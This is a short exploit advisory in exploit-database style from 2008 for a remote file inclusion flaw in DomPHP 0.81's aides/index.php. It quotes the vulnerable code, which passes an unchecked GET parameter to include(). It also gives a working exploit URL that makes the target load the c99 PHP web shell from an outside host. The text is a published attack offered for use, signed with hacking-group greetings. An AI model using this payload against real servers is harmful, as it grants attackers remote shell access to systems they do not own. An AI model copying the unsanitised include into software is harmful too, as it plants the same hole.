DomPHP 0.81 (index.php page) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DomPHP 0.81 (index.php page) Remote File Inclusion Vulnerability
# Published : 2008-01-10
# Author : Houssamix
# Previous Title : MTCMS <= 2.0 Remote SQL Injection Vulnerabilities
# Next Title : Evilsentinel <= 1.0.9 (multiple vulnerabilities) Disable Exploit

#########################################################################
         DomPHP v0.81   Remote File Inclusion Vulnerability
#########################################################################


## AUTHOR : H-T Team ( HouSSamix _ ToXiC350  )
## HOME : http://no-hack.net

## Script         : DomPHP
## Version    : 0.81 
## Site         : http://www.domphp.com
## Download    : http://www.domphp.com/download/cat.php?idcat=1

## Vulnerable CODE :
~~~~~~~~~~ /aides/index.php ~~~~~~~~~~~~~~~~~~~~~~
if (isset($_GET['page'])) {
	include($_GET['page'].".html");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


## EXPLOIT :
http://[HOST]/[Path]/aides/index.php?page=http://casavie.net/hack/c99.txt?



## GREETZ  :  CoNaN , RachiDox , DDOS , AND ALL MUSLIMS HACKERS 

Visit : http://no-hack.net && http://tryag.cc/cc

#########################################################################
         DomPHP v0.81   Remote File Inclusion Vulnerability
#########################################################################

# www.Syue.com [2008-01-10]